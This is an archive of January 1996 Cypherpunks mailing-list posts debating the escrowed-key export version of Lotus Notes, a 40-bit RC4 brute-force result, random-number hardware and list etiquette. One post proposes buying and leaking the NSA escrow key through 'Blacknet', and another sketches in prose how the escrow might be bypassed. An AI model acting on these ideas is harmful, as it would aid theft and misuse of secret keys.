Subject: POINTER: 01 17 96 CDT Policy Post
Message-ID: <Pine.BSD.3.91.960118161933.20721A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  Cypherpunks-related item in 01 17 96 CDT Policy Post: 
 
    FBI Surveillance Capacity Request Fails to Meet Public 
    Accountability Requirements of Digital Telephony Bill. 
 
 
  CDT = The Center for Democracy and Technology. 
 
  To subscribe to CDT's Policy Post list, send mail to: 
 
             policy-posts-request@cdt.org 
 
  with the subject:

                subscribe policy-posts 
 
 
  Cordially, 
 
  Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 19 Jan 1996 06:58:03 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Espionage-enabled Lotus notes.
Message-ID: <9601182245.AA01500@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:
> >It's specifically built for export, and has a backdoor to enable USG agents
> >to read the messages more easily. From the viewpoint of a foreign purchaser,
> >'espionage-enabled' seems an appropriate term.

TC May responds:
> I like this idea, and have already begun to use it. Even adding it to my
> already long .sig.

I think it's also time to break out the old "Big Brother Inside" stickers and  
start applying them to copies of Notes...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 19 Jan 1996 00:57:28 +0800
To: cypherpunks@toad.com
Subject: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry
Message-ID: <199601181602.RAA04965@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, Jan 18, 1996

IBM Compromises on Encryption Keys, U.S. Allows Export of
More-Secure Notes

By Thomas E. Weber

New York -- International Business Machines Corp., caving in
to intense government pressure, agreed to include a special
key that helps investigators tap into data messages in return
for permission to export a more-secure version of its Lotus
Notes software.

The U.S. has prevented software makers from exporting
sophisticated encryption technology for fear that terrorists
and other criminals would gain access to a snoop-proof
communications system. Industry observers said IBM's move
marked the first time a supplier agreed to give the government
special access to its software's security code.

Encryption keys have stirred the concern of privacy experts in
the past. While IBM's Lotus Development Corp. software unit
defended the move as a stopgap compromise until a broader
agreement on data security can be reached, Notes creator Ray
Ozzie clearly found the controversial plan somewhat
distasteful.

"We were desperate enough to try to negotiate a short-term,
pragmatic solution," Mr. Ozzie said. "But we do not believe
this is the right long-term solution."

One privacy advocate would agree. "The irreducible fact is
that foreign customers are reluctant to rely on security
products that have been compromised in some way" by federal
intelligence agencies, said Mike Godwin, staff counsel for the
Electronic Frontier Foundation.

Several years ago the government proposed the "Clipper"
computer chip that was programmed to let investigators tap
into phone calls and data messages transmitted digitally.
While that plan died after privacy advocates accused the
government of trying to spy on users, the idea of leaving a
back door open for government agents has remained alive.

Under the Lotus plan, government investigators would still
need to employ sophisticated code breaking to read messages
sent via Notes software, which lets users at different
computers collaborate. Security software encrypts information
by using a unique key of software code. The length of a key is
measured in computer bits, and longer keys are better --
they're more complex and more difficult for would-be spies,
not to mention government agents, to unravel.

Until now, to obtain an export license for Notes, Lotus has
been restricted to an encryption system of 40 bits in its
international version. Domestic users have been permitted to
use a higher-level, more-secure 64-bit system.

The new overseas version of Notes, tagged Release 4, will give
foreign users 64-bit security. But to get permission to export
the software, Lotus agreed to give the government access to 24
of those bits by using a special 24-bit key supplied by the
National Security Agency.

The plan effectively gives the government a headstart in
trying to break the encryption scheme. With 24 bits of the key
already in hand, the government need only crack the remaining
40 bits -- a task considered trivial for the code-masters at
the NSA. As far as the U.S. government is concerned, this
version of Notes is no more difficult to crack than the
previous one.

The advantage to customers, Mr. Ozzie said, is that anyone
other than the U.S. government -- say, a malevolent criminal
or computer hacker -- would face the more daunting task of
breaking the 64-bit key.

Mr. Ozzie said the move was a response to complaints from
foreign purchasers of Notes. "Our customers have been telling
us that, unless we did something about the security, we could
no longer call it a secure system," Mr. Ozzie said.

It remains to be seen whether Lotus's move will allow it to
sell more software. "The idea is a good stopgap measure," said
Stephen Franco, an analyst at Yankee Group in Boston. "But the
most important thing is pushing the U.S. government to relax
some of its restrictions" on exports.

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 20 Jan 1996 11:26:45 +0800
To: perry@piermont.com
Subject: Re: noise levels
In-Reply-To: <199601181520.KAA06653@jekyll.piermont.com>
Message-ID: <199601190051.RAA28314@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself Perry <perry@piermont.com> allegedly
wrote:
>
> The noise levels around here are getting astounding.

<snip>


Perry, I quite agree with you.  I am having a very difficult
time wading through cpunks, and I am currently reduced to
grepping for my name, and then picking out a topic or two by
subject line before junking 95% of the posts.  Since you have
such enthusiasm for solving the noise problem I suggest that we
do the following:


1.  Establish a "one-way" mailing list.  If you don't have an 
ISP which makes this convenient then I recommend Sameer's 
Community ConneXion.  It costs merely $7.50/month, it is very 
easy to create a mailing list, Sameer respects your privacy and
understands the importance of privacy and security issues, and
you can pay in Mark Twain Ecash.

2.  Write a script for your mail agent so that when you see a
noise post you can hit a key combination and send off a message
to all the recipients of your mailing list which identifies the
message (by its Message-ID, I suppose?) as trash.

3.  I will subscribe to your list.

4.  I will configure my mail user-agent to automatically delete
messages which have been identified by you as trash.



What do you say?  I'm up for it.


Hey, come to think of it I have a mailing list at C2 that isn't
being used for anything.  It is fortuitously named "c2punks".
Go ahead and send your "trash-o-meter" messages there and I will
receive them.  (That's "c2punks@c2.org".)



Of course there are some things we should work out as we go:


1.  You should PGP-sign your trash-o-meter messages.  Don't
worry about doing it on a secure box (who's going to crack your
e-mail hardware just so they can force me to read trash or 
delete cpunks mail from my inbox?).  You can configure your MUA 
to pass the passphrase to PGP (or have no passphrase) so that 
all you have to do is hit a single key combination to activate 
the "trashit" script.


2.  You might wonder what you are getting out of this?  I can
name 3 things:
   a.  Reducing the amount of c'groupies noise that I read, and
the amount of c'groupies noise that anyone else who subscribes
to "c2punks" reads.
   b.  Advancing the theory and practice of distributed ratings
systems.
   c.  I and others will reciprocate-- we will mail
"trash-o-meter" messages to c2punks which you can use so as to
read less trash yourself.


3.  I'll write some scripts that people can use to process 
trash-o-meter messages.  The first version will probably be in
sh and written for the mh mail-handling system.  Later versions
will work with different mail-handling systems, incorporate such
nifty features as author- and subject- trashing in addition to
message-trashin, having weighted scalar ratings, different
ratings categories, and so forth.


I'm entirely serious about this.  For the first iteration just
send something like "TRASH Message-ID: XXXXXXXXX" in the subject
line or the body.  We can discuss this in detail on c2punks if
it gets too specific to be on-topic in cpunks.  (What's your
flavor of MUA?  I'll write the trashit script for you.)



Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMP7qj/WZSllhfG25AQHmmwP9FbAxfvWz1SwQP0AeEUFODVnGVFSCgkxS
YzqzskooI8BZYEhBJVKSidM/jf3Hr/D+T5MsXsavH3hZ9aS5O4qYjuJO+7Y78bGe
NaCszo+OcScJXWQn2UdLEo3bsYNoNF3smXD/nndce5pMucAjxTb2Mzd/T3UbKAtH
AJZl7W2wUNw=
=Ulv6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Thu, 18 Jan 1996 19:37:58 +0800
To: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Subject: Re: underground digital economy
In-Reply-To: <2.2.32.19960118010840.00e13e78@netcom.com>
Message-ID: <Pine.SUN.3.91.960118181949.11798A-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Jan 1996, Alexander 'Sasha' Chislenko wrote:

>   If you sell a new version of CryptoDoom for digicash, and would like to
> buy a car that is only sold for paper money, and I have a car to sell and
> want to buy your CryptoDoom, *somewhere* in the market there will appear
> an exchange agent that would help us complete the transaction. In the
> case of parallel digital currencies this exchange market would be very
> liquid because of the high speed, low cost, and security/privacy of the
> transactions.

This model isn't as practical as it seems.  For one thing, it is a classic
case of barter: exchange for things that you want but don't have.  This
becomes extremely difficult with specialization.  Letsay I make only
CryptoDoom, its the only thing that I have the skills to make.  The things
that I want but can't produce each day are numerous: food, transport,
housing, ad infinitum.  One-to-one barter is only usefull if both agents
(in a 2 agent economy) need only 2 goods and specialize.

This is the root of money: a means of exchange between heterogenous
products.  Allthough a parallel digital internetwork would allow
occasional barters to increase there viability, it does not mean that
barter will replace money.  But there's some ambiguity here: What is
implied by "The case of parallel digital currencies this exchange market
would...."?  Does this recomend exchange markets (barter) or fiat
(currency)? 

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 19 Jan 1996 10:47:06 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Blacknet & Lotus Notes
Message-ID: <199601190013.TAA10250@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Espionage Enabling in Action, or
	"How much is that escrow key in the window?"

	We all know how cheaply spies sell out.  The Falcon and the
Snowman got a few tens of thousands for years of crypto keys and
satelite data.  Pollard got 50,000 for cubic yards of documents on all
sorts of subject.  The Walkers gave the Soviets a volume purchase
discount, and Ames got 2 million for running the CIA's
counter-espionage program on behalf of the KGB.  This little key to
handle 24 bits of data is nothing.  It can easily be smuggled out on a
floppy, in an encrypted email message, or even printed out and sent
through the mail.  Assuming many federal employees will all have
access to the same key, its not much of a secret.

	So, lets buy the espionage enabling secret key.  Its an
obvious target, not just for cypherpunks, but for the KGB, Mossad,
Toshiba, IBM, and anyone else who wants to read their competitors
correspondance.  Lets face it, this key will get out there, and be
available to all the big players; lets make it available to everyone!

	This is a job for ... Blacknet!  This is exactly the kind of
information thats easy to resell.  Its small; no smuggling DATs full
of B2 bomber plans out, just a small file on a floppy disk.  Its
easily checked, if the Lotus message formats are public, slightly less
so if they're not.  Who would buy?  Pick an intelligence agency.  Pick
any large company whose compitition uses Notes.  Heck, I'd bet there
are US government agencies (FBI, BATF, LAPD) who would buy it once we
made it available.

	Its a near perfect demonstration of the foolishness of the
government's position.  Once this key, like the clipper keys, becomes
easily available, the foolishness of the idea of GAK becomes
magnified.  Its ANOTHER government program that can't be run properly,
thats opposed by 80% of Americans, and that doesn't even sell
overseas.

	The persons responsible might even get to claim to be
whistleblowers, demonstrating how easy it is to subvert this foolish
plan that will continue to cost American business 60 billion a year in
lost sales overseas.

	So...Is Notes V4 shipping yet?  Do we know how many bits of
key we're after?  (NB: I'm assuming that (some part of) the US
government has an RSA private key which is used to encrypt the 24 bits
of GAK'd key.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 20 Jan 1996 07:07:25 +0800
To: David Golombek <daveg@pakse.mit.edu>
Subject: Re: Single computer breaks 40-bit RC4 in under 8 days
In-Reply-To: <9601190145.AA11333@pakse.mit.edu>
Message-ID: <Pine.ULT.3.91.960118191503.25375E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This takes "cracking Netscape security as a new benchmark" to a whole new 
level.

On Thu, 18 Jan 1996, David Golombek wrote:

> MIT Student Uses ICE Graphics Computer
> 
> To Break Netscape Security in Less Than 8 Days

What does this have to do with Netscape? This is about brute-forcing
40-bit RC4.  While Netscape does deserve flogging with a wet noodle down
to the seventh generation for their initial press response, this singling
out Netscape is annoying me a little. 

> While being an active proponent of stronger export encryption, Netscape
> Communications (NSCP), developer of the SSL security protocol, has said that
> to decrypt an Internet session would cost at least $10,000 in computing time.

OK, well, in that case.

> workstations, Doligez averaged 850,000 keys per second.ICE used the
> following formula to determine its $584 cost of computing power: the total
> cost of the computer divided by the number of days in a three-year lifespan
> (1,095), multiplied by the number of days (7.7) it takes to break the code.

This assumes, of however, that collecting encrypted communications,
feeding them to the computer with 100% efficiency, electricity, labor,
etc. are completely free. 

I hope everyone recognizes this as more old news and ICE marketing. In a
fantasy world, the press et al would see this and clamor for the
revocation of ITAR. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Makrecky" <Steve_Makrecky@msn.com>
Date: Fri, 19 Jan 1996 05:43:21 +0800
To: cypherpunks@toad.com
Subject: Keyboard & Mouse Recorder
Message-ID: <UPMAIL08.199601181928150432@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know where I can get a keyboard recorder for WIN95 and OS/2

I would like to record the mouse and keyboard strokes.  Then re-run the host 
program at a pre-determined time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Sat, 20 Jan 1996 11:16:59 +0800
To: perry@piermont.com
Subject: Re: Win95 Registration Wizard info
In-Reply-To: <199601181503.KAA06603@jekyll.piermont.com>
Message-ID: <199601190126.UAA22698@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Alan Olsen writes:
> > I picked this link up from the Fringewear list.
> [...]
> > The author takes the registration Wizard in Win95 apart and shows exactly
> > what it does and what it looks for.  Some interesting information about the
> > encrypted database of product information it uses.
> 
> What, exactly, does this have to do with cypherpunks?

I guess Perry didn't see the word 'encrypted'... Perry, you really ought to see the web page - it's
quite good, and has a lot of good information.  It also illustrates some of the pitfalls inherent in 
writing such applications, and exposes bad code written by commercial vendors.  I thought that that 
was part of what Cypherpunks is for, but maybe it's just for Perry-approved posts.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Fri, 19 Jan 1996 09:42:48 +0800
To: iquest.com!pdlamb@uplherc.upl.com (Patrick Lamb)
Subject: Re: Attack Simulator
In-Reply-To: <199601182006.OAA26389@vespucci.iquest.com>
Message-ID: <199601190129.UAA22928@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Is it just me, or does this sound like a commercial version of SATAN?  I
> wonder what makes SATAN unacceptable (besides the name) while something like
> this is apparently acceptable?

ISS and SATAN are different tools.  There is a non-commercial version of ISS available.  ISS didn't
get as much notice as SATAN - I guess it's because it's author isn't as widely known as Dan Farmer. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 19 Jan 1996 00:52:07 +0800
To: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Subject: Re: Random Number Generators
Message-ID: <199601181557.PAA06221@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy L. Nali" writes:
> The most promising design I've seen so far (that I can actually
> do) is based on clocking a D flip-flop in the following way:
> 
> [Shifts the output of a clock that he hopes will be sloppy into
> a shift register]

If you want noise, your circuit needs a known noise source, with 
known good properties

Your circuit has no known noise source, you are just hoping 
that there will be noise in it somewhere.

Johnson noise is amplified thermal noise thus it is known to 
be good:  Amplify johnson noise to signal levels, and then 
shift this random analog output into a long shift register.  
(You will need a long shift register to suppress metastable 
states.)  You should set up your low frequency analog 
feedback to get near equality of ones and zeros, and you 
should have digital feedback (similar to a CRC
generator) to get perfect equality of ones and zeros.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 20 Jan 1996 05:17:37 +0800
To: cypherpunks@toad.com
Subject: Re: Espionage-enabled Lotus notes.
In-Reply-To: <ad23e65c090210046157@[205.199.118.202]>
Message-ID: <199601190158.TAA03403@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


A couple of days ago there were reports that the NSA was considering 
easing up a bit on export restrictions.  Is the Lotus Notes approach what 
they were talking about?

I suppose it's a good thing that they're starting to see the value of at
least paying lip service to relaxing the rules, but that's all this is,
lip service.  It's the worst of both worlds, the security of a 40 bit key
with the spectre of gak thrown in to boot.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daveg@pakse.mit.edu (David Golombek)
Date: Fri, 19 Jan 1996 09:57:44 +0800
To: cypherpunks@toad.com
Subject: Single computer breaks 40-bit RC4 in under 8 days
Message-ID: <9601190145.AA11333@pakse.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


MIT Student Uses ICE Graphics Computer

To Break Netscape Security in Less Than 8 Days

Cost to crack Netscape security falls from $10,000 to $584

CAMBRIDGE, Mass., January 10, 1996 -- An MIT undergraduate and part-time
programmer used a single $83,000 graphics computer from Integrated Computing
Engines (ICE) to crack Netscape's export encryption code in less than eight
days. The effort by student Andrew Twyman demonstrated that ICE's advances
in hardware price/performance ratios make it relatively inexpensive -- $584
per session -- to break the code.

While being an active proponent of stronger export encryption, Netscape
Communications (NSCP), developer of the SSL security protocol, has said that
to decrypt an Internet session would cost at least $10,000 in computing time.

Twyman used the same brute-force algorithm as Damien Doligez, the French
researcher who was one of the first to crack the original SSL Challenge.
The challenge presented the encrypted data of a Netscape session, using the
default exportable mode, 40-bit RC4 encryption.  Doligez broke the code in
eight days using 112 workstations.

"The U.S. government has drastically underestimated the pace of technology
development," says Jonas Lee, ICE's general manager.  "It doesn't take a
hundred workstations more than a week to break the code -- it takes one ICE
graphics computer. This shuts the door on any argument against stronger
export encryption."

Breaking the code relies more on raw computing power than hacking expertise.
Twyman modified Doligez's algorithm to run on ICE's Desktop RealTime Engine
(DRE), a briefcase-size graphics computer that connects to a PC host to
deliver performance
of 6.3 Gflops (billions of floating point instructions per second).
According to Twyman, the program tests each of the trillion 40-bit keys
until it finds the correct one. Twyman's program averaged more than 830,000
keys per second, so it would take 15 days to test every key.  The average
time to find a key, however, was 7.7 days.  Using more than 100
workstations, Doligez averaged 850,000 keys per second.ICE used the
following formula to determine its $584 cost of computing power: the total
cost of the computer divided by the number of days in a three-year lifespan
(1,095), multiplied by the number of days (7.7) it takes to break the code.

ICE's Desktop RealTime Engine combines the power of a supercomputer with the
price of a workstation.  Designed for high-end graphics, virtual reality,
simulations and compression, it reduces the cost of computing from $160 per
Mflop (millions of floating point instructions per second) to $13 per Mflop.
ICE, founded in 1994, is the exclusive licensee of MeshSP technology from
the Massachusetts Institute of Technology (MIT).

###

INTEGRATED COMPUTING ENGINES, INC.
460 Totten Pond Road, 6th Floor
Waltham, MA 02154
Voice: 617-768-2300, Fax: 617-768-2301

FOR FURTHER INFORMATION CONTACT:

Bob Cramblitt, Cramblitt & Company 
(919) 481-4599; cramco@interpath.com
 
Jonas Lee, Integrated Computing Engines 
(617) 768-2300, X1961; jonas@iced.com

Note: Andrew Twyman can be reached at kurgan@mit.edu.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@beijing.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 19 Jan 1996 10:09:22 +0800
To: cypherpunks@toad.com
Subject: Re: Hack Lotus?
Message-ID: <199601190154.UAA24710@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <2.2.32.19960118195838.008a4944@mail.teleport.com>,
Alan Olsen <alano@teleport.com> wrote:
> I am certain that comparisons between the export and non-export (with
> softice and other debugger-type software) will show some interesting things.

Hack Lotus?  Please do.

I would love to see the internals of how Lotus Notes does the escrow.
Every conceivable way I can see to do it seems very vulnerable to attack.

If the receiving Lotus Notes program doesn't check whether the high 24
bits have been escrowed correctly in the LEEF-like field, then a simple
hack to the sending Lotus Notes program to not send the LEEF field
should give foreigners true 64 bit encryption.

[LEEF = Law-enforcement / Espionage Exploitation Field = the RSA-encrypted
high 24 bits of the key]

If the receiving Lotus Notes program does verify that the high 24 bits
are escrowed correctly, then anyone can verify that, so in 2^24 trials,
I can recover the high 24 bits, and with 2^40 more trials, I can recover
the high 40 bits.  Therefore 2^40 + 2^24 trials should suffice to hack
Lotus if this is how it works.

Or maybe it works in some other crazy manner.

Waiting to hear the technical details of how it works,
- -- Dave Wagner
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMP751yoZzwIn1bdtAQGvzgF/RPhioKYfwXcqHoDCwyyVHZFgyR26KQCz
swwAnSDPydO5jKFjFNK5XaM9XRh2Vi3a
=HLSf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 19 Jan 1996 13:05:05 +0800
To: cypherpunks@toad.com
Subject: Elitism on Cypherpunks
Message-ID: <2.2.32.19960119045517.008842f4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have seen a number of posts on "Cypherpunk Elitism".  I have seen more 
examples of it here on the list.

I think that this attitude will be more destructive to the list than noise 
in the long run.

It has been said that "Cypherpunks write code".  They must do more than 
that.  Cypherpunks need to teach.

All the cryptotools in the world are of no use if no one knows how to use 
them.  (Or know how to use them correctly.)  All of the protocols are of no 
use if no one knows how to impliment them correctly or WHY they need them in 
the first place.

There are alot of bogus security methods.  Many of them exist because people 
do not know better. Without someone to instruct them in the ways of these 
things, they will continue to go on with bad crypto, not knowing any better.

Not all of the non-cypherpunks are beyond hope.  Many of them are teachable. 
 If we leave them to flounder on their own, cryptography will be something 
used only by an elite.  It will be of little or no threat to the powers that 
be because only a small amount of people will have the ability to use it.  
The TLAs will have less encrypted trafic to sort through.  They will have 
won a big battle, not through force of arms but force of egos.

What can be done?  Alot.

Teach people how to use PGP.  Help them generate keys.  Help them get them 
signed.  Show them how to use remailers.  Teach them the secret of nyms.  
Friends teach friends how to use crypto.

Adopt a BBS.  They may be young, but they may also become the cypherpunks of 
tommorow.  Upload current versions of programs.  Keep them current.  
Organize keysignings on the board.  Host crypto discussions.  Help stamp out 
the misinformation that breeds on such systems.

Instilling the interest in the field and teaching will do more for the cause 
than all of the "this is noise" postings in the world.  Helping those who 
have questions will help the newbies no longer be newbies.

There are some on the list who have already taken this tact and must be 
commended.  There are others who have taken the "fuck you" attitude to 
anyone they do not find worthy opon first contact.  Bad attitudes are 
counter productive.

To prevent the fall of a new dark ages, we must make sure that the 
information is spread far and wide.  I think the statement that descibes it 
best is:

           "UN-altered REPRODUCTION and DISSEMINATION of 
            this IMPORTANT information is ENCOURAGED."

There is alot that cypherpunks can do to encourage the use of cryptography 
by "the common man".  Elitism is not one of them.  In the long run it will 
be counterproductive.  And maybe in the short run as well...




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMP8jQeQCP3v30CeZAQHtjAf9FfJWRAe0ZDLNOLsFDMBGQvi9kXKZR3sw
WDmOb3K/y8syCdADqqC4UjqoZ0pQ/XHEt6qKd8A7qx6D1FVQauTocEp1vqwE645h
zGirsApDjiCYFmV/+Lbpor5Uf9F2rFbjya64lOTbiKW+XEGukpI3ghgbGxGPqPGF
fIIT2QxqMl1MDd1sSGIXzvpniOsHI6HoVbPwUx8S2tbMR0dqh5AQObOKdna0D4x4
beAxEVyNd6atqdkZPEZy2XaSO6Y4hmRZx3I4CuqCM2wqbsboETQLpELBSn/dnxet
0Fe82xHHZQSuh0gMXEP+znaKYOq/38mijwjF3zpX+5RRHIVrjMu2+w==
=ojHr
-----END PGP SIGNATURE-----
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 21 Jan 1996 11:00:04 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: PARTY-PARTY-PARTY
In-Reply-To: <Pine.SUN.3.91.960118191945.4039A-100000@crl7.crl.com>
Message-ID: <199601190607.WAA10545@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 		http://www.c2.org/party/masquerade/html

	that's http://www.c2.org/party/masquerade.html

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 19 Jan 1996 10:51:34 +0800
To: cypherpunks@toad.com
Subject: Junk Notes
Message-ID: <199601182338.AAA21899@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



New York (AP) -- For the first time in years, there were
no major trouble spots in IBM's vast product line. Both
personal computers and large systems sold well and Lotus
Development Corp., which IBM acquired last summer,
shipped an astounding 1.2 million copies of its Notes
program. "Our fundamental strategies are working," IBM
chief executive Louis V. Gerstner Jr. said in a
statement.  ...

Changes in the general export laws seemed unlikely so
Lotus negotiated an interim solution. "This protects
corporate information from malicious crackers 
but permits the government to retain their current
access," Ozzie said.

Simson Garfinkel, author and computer security expert,
said he's not sure international buyers of Notes will
like the solution. "Foreign companies don't want the U.S.
government to spy on their data any more than the U.S.
government wants foreign companies to be able to spy on
theirs," Garfinkel said.  ...

But IBM said nothing about the future, causing some
nervousness among the investors who have seen other
technology companies project a flat performance in the
next few months. "It was a good quarter but the bad news
is we've got to go and find out what's going to happen in
1996," said David Wu, analyst at Chicago Corp.  

Questions have been raised about the timing of IBM's June
acquisition of Lotus -- a $3.5 billion deal that was the 
software industry's largest ever -- because World Wide
Web-related programs seemed to be eclipsing the need for
Lotus' Notes, a communications and database program.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 19 Jan 1996 14:00:36 +0800
To: vznuri@netcom.com
Subject: Re: remarkable recent stories
Message-ID: <Pine.BSD.3.91.960119004627.28695A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Vladimir, 
 
 
  On 01 16 96 you wrote: 
 
    I haven't seen much dialogue on...key things that have 
    popped up recently.... 
 
 
  Among those key things: 
 
    the absolute biggest blockbuster of them all: the NSA... 
    did a study about how crypto regulations affect US com- 
    petitiveness in the international marketplace.... 
 
   
  And you ask: 
 
    why would they release *this* one?
 
  meaning the NSA study on how crypto regulations affect 
  US competitiveness abroad. 
 
 
  On 01 13 96 I wrote a message to the list headed "ITAR 
  Re-write?"   In it I attempt to answer your question. 
 
  I include it below for your convenience. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  INCLOSURE: 
 
  Date: Sat, 13 Jan 1996 05:04:52 -0500 (EST)
  From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
  To: cypherpunks@toad.com
  Subject: ITAR Re-write ? 

 
 
  Friend, 
 
 
  Bloomberg, the business news agency, reports 01 12 96: 
 
     The U.S. Commerce Department will recommend easing 
     export controls on encryption software after a study by 
     the department and the National Security Agency found 
     that American firms are being hurt.... 
 
     The report's release came on the same day federal pro- 
     secutors dropped a three-year investigation...of...Philip 
     Zimmerman.... 
 
     The government study comes a week after [the Computer 
     Systems Policy Project] released [its] own study showing 
     ...American companies will lose [maybe $60 billion] in 
     U.S. computer system sales expected in 2000.... 
 
 
  The 13-member Project 
 
     ...includes International Business Machines...and AT&T.... 
 
 
  Perhaps the let-go of Zimmerman is less a triumph of right 
  than of might? 
 
  But economic might is not the only kind of might: 
 
     [Easing export controls] may pit Brown's department a- 
     gainst U.S. defense and spy agencies.... 
 
 
  So... 
 
     [Commerce Secretary] Brown said his department will pre- 
     pare recommendations for easing [ITAR] controls that 
     should be forwarded to the president "within a few months." 
 
 
  Meaning: the 13 Project members should be prepared to pay 
  through the nose in the runup to the '96 gala. 
 
  And just so they get the big picture: 
 
     It's unclear if the NSA, the super-secret eavesdropping 
     agency, endorsed the Commerce Department's conclusions 
